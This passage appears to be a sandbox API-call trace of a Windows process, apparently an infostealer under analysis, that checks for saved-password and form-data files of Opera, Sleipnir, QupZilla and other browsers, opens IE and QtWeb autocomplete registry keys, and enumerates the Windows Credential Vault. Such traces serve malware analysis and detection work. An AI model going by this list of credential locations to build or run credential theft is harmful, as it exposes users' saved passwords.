LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.398] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0235.398] GetProcessHeap () returned 0x740000 [0235.398] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.398] GetProcessHeap () returned 0x740000 [0235.399] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757bf8 | out: hHeap=0x740000) returned 1 [0235.665] GetProcessHeap () returned 0x740000 [0235.665] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x757bf8 [0235.666] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0235.666] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x757bf8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0235.670] GetProcessHeap () returned 0x740000 [0235.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757ee8 [0235.670] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.671] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0235.671] GetProcessHeap () returned 0x740000 [0235.671] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb6) returned 0x75be78 [0235.671] GetProcessHeap () returned 0x740000 [0235.672] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.673] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0235.673] GetProcessHeap () returned 0x740000 [0235.674] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be78 | out: hHeap=0x740000) returned 1 [0235.674] GetProcessHeap () returned 0x740000 [0235.674] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757ee8 [0235.675] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.676] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0235.676] GetProcessHeap () returned 0x740000 [0235.676] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb2) returned 0x75be70 [0235.676] GetProcessHeap () returned 0x740000 [0235.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.678] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0235.678] GetProcessHeap () returned 0x740000 [0235.679] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be70 | out: hHeap=0x740000) returned 1 [0235.679] GetProcessHeap () returned 0x740000 [0235.679] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757ee8 [0235.680] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.681] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0235.681] GetProcessHeap () returned 0x740000 [0235.681] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75be50 [0235.681] GetProcessHeap () returned 0x740000 [0235.681] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.682] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0235.683] GetProcessHeap () returned 0x740000 [0235.683] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be50 | out: hHeap=0x740000) returned 1 [0235.683] GetProcessHeap () returned 0x740000 [0235.683] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757ee8 [0235.684] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.685] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0235.685] GetProcessHeap () returned 0x740000 [0235.685] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74a848 [0235.687] GetProcessHeap () returned 0x740000 [0235.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.689] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0235.689] GetProcessHeap () returned 0x740000 [0235.690] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74a848 | out: hHeap=0x740000) returned 1 [0235.690] GetProcessHeap () returned 0x740000 [0235.690] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757ee8 [0235.690] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.691] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0235.691] GetProcessHeap () returned 0x740000 [0235.691] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc2) returned 0x74ede8 [0235.691] GetProcessHeap () returned 0x740000 [0235.692] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.693] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0235.693] GetProcessHeap () returned 0x740000 [0235.693] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ede8 | out: hHeap=0x740000) returned 1 [0235.693] GetProcessHeap () returned 0x740000 [0235.693] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757ee8 [0235.697] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.698] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0235.698] GetProcessHeap () returned 0x740000 [0235.698] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xbe) returned 0x75be70 [0235.698] GetProcessHeap () returned 0x740000 [0235.698] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.700] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0235.700] GetProcessHeap () returned 0x740000 [0235.700] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be70 | out: hHeap=0x740000) returned 1 [0235.700] GetProcessHeap () returned 0x740000 [0235.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757ee8 [0235.701] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.702] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0235.702] GetProcessHeap () returned 0x740000 [0235.702] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74b178 [0235.702] GetProcessHeap () returned 0x740000 [0235.703] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.703] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0235.704] GetProcessHeap () returned 0x740000 [0235.704] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b178 | out: hHeap=0x740000) returned 1 [0235.704] GetProcessHeap () returned 0x740000 [0235.704] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757ee8 [0235.705] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.827] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0235.827] GetProcessHeap () returned 0x740000 [0235.827] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xac) returned 0x75be60 [0235.827] GetProcessHeap () returned 0x740000 [0235.828] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.829] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0235.830] GetProcessHeap () returned 0x740000 [0235.830] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be60 | out: hHeap=0x740000) returned 1 [0235.830] GetProcessHeap () returned 0x740000 [0235.830] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757ee8 [0235.831] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.833] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0235.833] GetProcessHeap () returned 0x740000 [0235.833] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf0) returned 0x75be78 [0235.833] GetProcessHeap () returned 0x740000 [0235.833] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.834] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0235.835] GetProcessHeap () returned 0x740000 [0235.835] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be78 | out: hHeap=0x740000) returned 1 [0235.836] GetProcessHeap () returned 0x740000 [0235.836] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757ee8 [0235.837] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.838] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0235.838] GetProcessHeap () returned 0x740000 [0235.838] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xec) returned 0x75be70 [0235.838] GetProcessHeap () returned 0x740000 [0235.838] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.854] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0235.854] GetProcessHeap () returned 0x740000 [0235.855] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be70 | out: hHeap=0x740000) returned 1 [0235.855] GetProcessHeap () returned 0x740000 [0235.856] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757ee8 [0235.856] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.857] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0235.857] GetProcessHeap () returned 0x740000 [0235.857] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xca) returned 0x75be50 [0235.858] GetProcessHeap () returned 0x740000 [0235.859] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0235.860] GetProcessHeap () returned 0x740000 [0235.861] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be50 | out: hHeap=0x740000) returned 1 [0235.861] GetProcessHeap () returned 0x740000 [0235.861] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757ee8 [0235.862] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.863] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0235.863] GetProcessHeap () returned 0x740000 [0235.863] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xda) returned 0x75be60 [0235.863] GetProcessHeap () returned 0x740000 [0235.863] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.865] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0235.865] GetProcessHeap () returned 0x740000 [0235.865] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be60 | out: hHeap=0x740000) returned 1 [0235.866] GetProcessHeap () returned 0x740000 [0235.866] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757ee8 [0235.867] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.868] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0235.868] GetProcessHeap () returned 0x740000 [0235.868] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf2) returned 0x75be78 [0235.868] GetProcessHeap () returned 0x740000 [0235.868] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.869] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0235.870] GetProcessHeap () returned 0x740000 [0235.870] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be78 | out: hHeap=0x740000) returned 1 [0235.870] GetProcessHeap () returned 0x740000 [0235.870] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757ee8 [0235.871] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.872] wvsprintfW (in: param_1=0x757ee8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0235.872] GetProcessHeap () returned 0x740000 [0235.872] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xee) returned 0x75be70 [0235.872] GetProcessHeap () returned 0x740000 [0235.872] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0235.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.874] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0235.874] GetProcessHeap () returned 0x740000 [0235.874] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be70 | out: hHeap=0x740000) returned 1 [0235.875] GetProcessHeap () returned 0x740000 [0235.875] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757ee8 [0235.875] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.877] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0235.877] GetProcessHeap () returned 0x740000 [0235.877] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xcc) returned 0x75be50 [0235.877] GetProcessHeap () returned 0x740000 [0235.877] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0236.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0236.011] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0236.011] GetProcessHeap () returned 0x740000 [0236.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be50 | out: hHeap=0x740000) returned 1 [0236.012] GetProcessHeap () returned 0x740000 [0236.012] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757ee8 [0236.012] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0236.013] wvsprintfW (in: param_1=0x757ee8, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0236.013] GetProcessHeap () returned 0x740000 [0236.013] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xdc) returned 0x75be60 [0236.013] GetProcessHeap () returned 0x740000 [0236.014] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0236.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0236.015] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0236.016] GetProcessHeap () returned 0x740000 [0236.016] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be60 | out: hHeap=0x740000) returned 1 [0236.183] GetProcessHeap () returned 0x740000 [0236.183] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x757ee8 [0236.184] GetProcessHeap () returned 0x740000 [0236.184] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b890 [0236.184] GetProcessHeap () returned 0x740000 [0236.184] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x7474d8 [0236.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0236.185] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x7474d8 | out: phkResult=0x7474d8*=0x0) returned 0x2 [0236.186] GetProcessHeap () returned 0x740000 [0236.186] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7474d8 | out: hHeap=0x740000) returned 1 [0236.186] GetProcessHeap () returned 0x740000 [0236.186] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0236.186] GetProcessHeap () returned 0x740000 [0236.186] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b890 | out: hHeap=0x740000) returned 1 [0236.186] GetProcessHeap () returned 0x740000 [0236.186] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x757ee8 [0236.188] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0236.189] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x757ee8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0236.189] GetProcessHeap () returned 0x740000 [0236.189] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f94) returned 0x7580f8 [0236.190] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0236.191] wvsprintfW (in: param_1=0x7580f8, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0236.191] GetProcessHeap () returned 0x740000 [0236.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9a) returned 0x74b028 [0236.191] GetProcessHeap () returned 0x740000 [0236.192] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7580f8 | out: hHeap=0x740000) returned 1 [0236.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0236.193] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0236.193] GetProcessHeap () returned 0x740000 [0236.194] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b028 | out: hHeap=0x740000) returned 1 [0236.194] GetProcessHeap () returned 0x740000 [0236.194] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757ee8 | out: hHeap=0x740000) returned 1 [0236.324] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6ce80000 [0237.560] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultEnumerateItems") returned 0x6ce8b960 [0237.561] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultEnumerateVaults") returned 0x6cea3510 [0237.561] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultFree") returned 0x6ce97050 [0237.562] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultGetItem") returned 0x6ce8bb70 [0237.563] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultGetItem") returned 0x6ce8bb70 [0237.563] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultOpenVault") returned 0x6ce8bc10 [0237.564] GetProcAddress (hModule=0x6ce80000, lpProcName="VaultCloseVault") returned 0x6ce8bc90 [0237.565] GetVersionExW (in: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x756cac06, dwMinorVersion=0x19fb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="되t쾓瞼") | out: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0237.565] VaultEnumerateVaults () returned 0x0 [0237.578] GetProcessHeap () returned 0x740000 [0237.578] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75a488 [0237.578] GetProcessHeap () returned 0x740000 [0237.578] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b950 [0237.578] VaultOpenVault () returned 0x0 [0237.579] VaultEnumerateItems () returned 0x0 [0237.579] VaultFree () returned 0x0 [0237.580] VaultCloseVault () returned 0x6 [0237.583] VaultOpenVault () returned 0x0 [0237.584] VaultEnumerateItems () returned 0x0 [0237.589] VaultFree () returned 0x0 [0237.589] VaultCloseVault () returned 0x6 [0237.589] GetProcessHeap () returned 0x740000 [0237.590] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.590] GetProcessHeap () returned 0x740000 [0237.590] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b950 | out: hHeap=0x740000) returned 1 [0237.590] GetProcessHeap () returned 0x740000 [0237.590] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75a488 [0237.590] GetProcessHeap () returned 0x740000 [0237.590] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b908 [0237.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0237.591] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19fbb8 | out: phkResult=0x19fbb8*=0x0) returned 0x2 [0237.592] GetProcessHeap () returned 0x740000 [0237.593] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.593] GetProcessHeap () returned 0x740000 [0237.593] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b908 | out: hHeap=0x740000) returned 1 [0237.593] GetProcessHeap () returned 0x740000 [0237.593] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0237.594] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0237.595] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0237.595] GetProcessHeap () returned 0x740000 [0237.595] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f50) returned 0x75acb0 [0237.596] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0237.596] wvsprintfW (in: param_1=0x75acb0, param_2="%s\\Opera", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0237.596] GetProcessHeap () returned 0x740000 [0237.596] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x759178 [0237.596] GetProcessHeap () returned 0x740000 [0237.597] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75acb0 | out: hHeap=0x740000) returned 1 [0237.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0237.598] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0237.598] GetProcessHeap () returned 0x740000 [0237.599] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0237.599] GetProcessHeap () returned 0x740000 [0237.599] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x759178 | out: hHeap=0x740000) returned 1 [0237.717] GetProcessHeap () returned 0x740000 [0237.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75a488 [0237.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0237.718] SHGetValueW (in: hkey=0x80000002, 